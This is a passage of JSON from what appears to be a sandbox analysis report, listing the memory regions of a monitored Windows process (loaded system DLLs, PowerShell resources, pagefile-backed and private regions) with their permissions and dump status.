dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 356351, "entry_point": 0, "filename": null, "id": "region_516", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:37.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_517", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:37.448", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 471039, "entry_point": 458752, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_518", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:00:37.448", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000519-addr_0x0000000000080000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_42", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 528383, "entry_point": 0, "filename": null, "id": "region_519", "name": "private_0x0000000000080000", "norm_filename": null, "region_type": "private_memory", "start_va": 524288, "timestamp": "00:00:37.501", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000520-addr_0x0000000000180000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_43", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_520", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:00:37.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 6062079, "entry_point": 0, "filename": null, "id": "region_521", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:00:37.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6094848, "type": "region", "version": 1 }, "end_va": 7671807, "entry_point": 0, "filename": null, "id": "region_522", "name": "pagefile_0x00000000005d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6094848, "timestamp": "00:00:37.502", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 7733248, "type": "region", "version": 1 }, "end_va": 28704767, "entry_point": 0, "filename": null, "id": "region_523", "name": "pagefile_0x0000000000760000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7733248, "timestamp": "00:00:37.502", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000524-addr_0x0000000001c00000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_44", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 29360128, "type": "region", "version": 1 }, "end_va": 29425663, "entry_point": 0, "filename": null, "id": "region_524", "name": "private_0x0000000001c00000", "norm_filename": null, "region_type": "private_memory", "start_va": 29360128, "timestamp": "00:00:37.503", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000525-addr_0x0000000001c10000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_45", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 29425664, "type": "region", "version": 1 }, "end_va": 30474239, "entry_point": 0, "filename": null, "id": "region_525", "name": "private_0x0000000001c10000", "norm_filename": null, "region_type": "private_memory", "start_va": 29425664, "timestamp": "00:00:37.503", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000526-addr_0x0000000001ee0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_46", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 32374784, "type": "region", "version": 1 }, "end_va": 32899071, "entry_point": 0, "filename": null, "id": "region_526", "name": "private_0x0000000001ee0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32374784, "timestamp": "00:00:37.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791751393280, "type": "region", "version": 1 }, "end_va": 8791751454719, "entry_point": 8791751397392, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_527", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791751393280, "timestamp": "00:00:37.503", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791758405632, "type": "region", "version": 1 }, "end_va": 8791758594047, "entry_point": 8791758409744, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_528", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791758405632, "timestamp": "00:00:37.504", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791762206720, "type": "region", "version": 1 }, "end_va": 8791763292159, "entry_point": 8791762210916, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_529", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791762206720, "timestamp": "00:00:37.505", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791716921344, "type": "region", "version": 1 }, "end_va": 8791717273599, "entry_point": 8791716969408, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_530", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791716921344, "timestamp": "00:00:37.508", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1642495, "entry_point": 0, "filename": null, "id": "region_531", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:00:37.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 30474240, "type": "region", "version": 1 }, "end_va": 31387647, "entry_point": 0, "filename": null, "id": "region_532", "name": "pagefile_0x0000000001d10000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30474240, "timestamp": "00:00:37.514", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000533-addr_0x0000000002100000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_47", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 34603008, "type": "region", "version": 1 }, "end_va": 35127295, "entry_point": 0, "filename": null, "id": "region_533", "name": "private_0x0000000002100000", "norm_filename": null, "region_type": "private_memory", "start_va": 34603008, "timestamp": "00:00:37.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791757750272, "type": "region", "version": 1 }, "end_va": 8791758376959, "entry_point": 8791757757456, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_534", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791757750272, "timestamp": "00:00:37.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1708031, "entry_point": 0, "filename": null, "id": "region_535", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:00:37.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791764172800, "type": "region", "version": 1 }, "end_va": 8791778361343, "entry_point": 8791764684476, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_536", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791764172800, "timestamp": "00:00:37.520", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 122880, "start_va": 8791739596800, "type": "region", "version": 1 }, "end_va": 8791739719679, "entry_point": 8791739596800, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_537", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 8791739596800, "timestamp": "00:00:37.560", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791752507392, "type": "region", "version": 1 }, "end_va": 8791752568831, "entry_point": 8791752513968, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_538", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791752507392, "timestamp": "00:00:37.572", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1777663, "entry_point": 0, "filename": null, "id": "region_539", "name": "pagefile_0x00000000001b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1769472, "timestamp": "00:00:37.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791730683904, "type": "region", "version": 1 }, "end_va": 8791732731903, "entry_point": 8791732308260, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_540", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791730683904, "timestamp": "00:00:37.589", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1839103, "entry_point": 0, "filename": null, "id": "region_541", "name": "pagefile_0x00000000001c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1835008, "timestamp": "00:00:37.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 1974271, "entry_point": 0, "filename": null, "id": "region_542", "name": "pagefile_0x00000000001e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1966080, "timestamp": "00:00:37.615", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000543-addr_0x0000000001e40000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_48", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 31719424, "type": "region", "version": 1 }, "end_va": 32243711, "entry_point": 0, "filename": null, "id": "region_543", "name": "private_0x0000000001e40000", "norm_filename": null, "region_type": "private_memory", "start_va": 31719424, "timestamp": "00:00:37.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 35127296, "type": "region", "version": 1 }, "end_va": 38072319, "entry_point": 35127296, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_544", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 35127296, "timestamp": "00:00:37.616", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 8791729111040, "type": "region", "version": 1 }, "end_va": 8791730339839, "entry_point": 8791729149116, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_545", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 8791729111040, "timestamp": "00:00:37.616", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000546-addr_0x000007fffffdb000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_49", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092870656, "type": "region", "version": 1 }, "end_va": 8796092878847, "entry_point": 0, "filename": null, "id": "region_546", "name": "private_0x000007fffffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092870656, "timestamp": "00:00:37.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791728717824, "type": "region", "version": 1 }, "end_va": 8791728902143, "entry_point": 8791728721936, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_547", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791728717824, "timestamp": "00:00:37.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791781212160, "type": "region", "version": 1 }, "end_va": 8791781548031, "entry_point": 8791781216468, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_548", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791781212160, "timestamp": "00:00:37.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 159744, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2256895, "entry_point": 2097152, "filename": "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db", "id": "region_549", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db", "norm_filename": "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db", "region_type": "memory_mapped_file", "start_va": 2097152, "timestamp": "00:00:37.670", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2297855, "entry_point": 0, "filename": null, "id": "region_550", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:00:37.670", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 38076416, "type": "region", "version": 1 }, "end_va": 42217471, "entry_point": 0, "filename": null, "id": "region_551", "name": "pagefile_0x0000000002450000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 38076416, "timestamp": "00:00:37.670", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 8791754145792, "type": "region", "version": 1 }, "end_va": 8791754366975, "entry_point": 8791754151028, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_552", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 8791754145792, "timestamp": "00:00:37.670", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 8791754407936, "type": "region", "version": 1 }, "end_va": 8791754514431, "entry_point": 8791754413400, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_553", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 8791754407936, "timestamp": "00:00:37.671", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 8791782129664, "type": "region", "version": 1 }, "end_va": 8791784058879, "entry_point": 8791782133776, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_554", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 8791782129664, "timestamp": "00:00:37.671", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000555-addr_0x0000000002890000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_50", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 42532864, "type": "region", "version": 1 }, "end_va": 43057151, "entry_point": 0, "filename": null, "id": "region_555", "name": "private_0x0000000002890000", "norm_filename": null, "region_type": "private_memory", "start_va": 42532864, "timestamp": "00:00:37.725", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 8791696343040, "type": "region", "version": 1 }, "end_va": 8791696699391, "entry_point": 8791696343040, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_556", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 8791696343040, "timestamp": "00:00:37.725", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000557-addr_0x000007fffffd9000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_51", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092862464, "type": "region", "version": 1 }, "end_va": 8796092870655, "entry_point": 0, "filename": null, "id": "region_557", "name": "private_0x000007fffffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092862464, "timestamp": "00:00:37.736", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791649878016, "type": "region", "version": 1 }, "end_va": 8791650091007, "entry_point": 8791649878016, "filename": "\\Windows\\System32\\shdocvw.dll", "id": "region_558", "name": "shdocvw.dll", "norm_filename": "c:\\windows\\system32\\shdocvw.dll", "region_type": "memory_mapped_file", "start_va": 8791649878016, "timestamp": "00:00:37.740", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2047999, "entry_point": 2031616, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_559", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 2031616, "timestamp": "00:00:38.009", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 28704768, "type": "region", "version": 1 }, "end_va": 28901375, "entry_point": 28704768, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db", "id": "region_560", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db", "region_type": "memory_mapped_file", "start_va": 28704768, "timestamp": "00:00:38.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 28901376, "type": "region", "version": 1 }, "end_va": 28917759, "entry_point": 28901376, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_561", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 28901376, "timestamp": "00:00:38.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 32899072, "type": "region", "version": 1 }, "end_va": 33316863, "entry_point": 32899072, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_562", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 32899072, "timestamp": "00:00:38.011", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000563-addr_0x0000000002030000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_52", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 33751040, "type": "region", "version": 1 }, "end_va": 34275327, "entry_point": 0, "filename": null, "id": "region_563", "name": "private_0x0000000002030000", "norm_filename": null, "region_type": "private_memory", "start_va": 33751040, "timestamp": "00:00:38.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791649812480, "type": "region", "version": 1 }, "end_va": 8791649861631, "entry_point": 8791649817472, "filename": "\\Windows\\System32\\linkinfo.dll", "id": "region_564", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\system32\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 8791649812480, "timestamp": "00:00:38.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 8791675109376, "type": "region", "version": 1 }, "end_va": 8791675633663, "entry_point": 8791675128460, "filename": "\\Windows\\System32\\ntshrui.dll", "id": "region_565", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\system32\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 8791675109376, "timestamp": "00:00:38.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791675633664, "type": "region", "version": 1 }, "end_va": 8791675695103, "entry_point": 8791675637824, "filename": "\\Windows\\System32\\cscapi.dll", "id": "region_566", "name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 8791675633664, "timestamp": "00:00:38.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791723343872, "type": "region", "version": 1 }, "end_va": 8791723388927, "entry_point": 8791723364236, "filename": "\\Windows\\System32\\slc.dll", "id": "region_567", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 8791723343872, "timestamp": "00:00:38.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 8791750344704, "type": "region", "version": 1 }, "end_va": 8791750488063, "entry_point": 8791750349208, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_568", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 8791750344704, "timestamp": "00:00:38.014", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000003-region_00000569-addr_0x000007fffffd7000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_53", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092854272, "type": "region", "version": 1 }, "end_va": 8796092862463, "entry_point": 0, "filename": null, "id": "region_569", "name": "private_0x000007fffffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092854272, "timestamp": "00:00:38.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791746347008, "type": "region", "version": 1 }, "end_va": 8791746441215, "entry_point": 8791746359992, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_570", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", 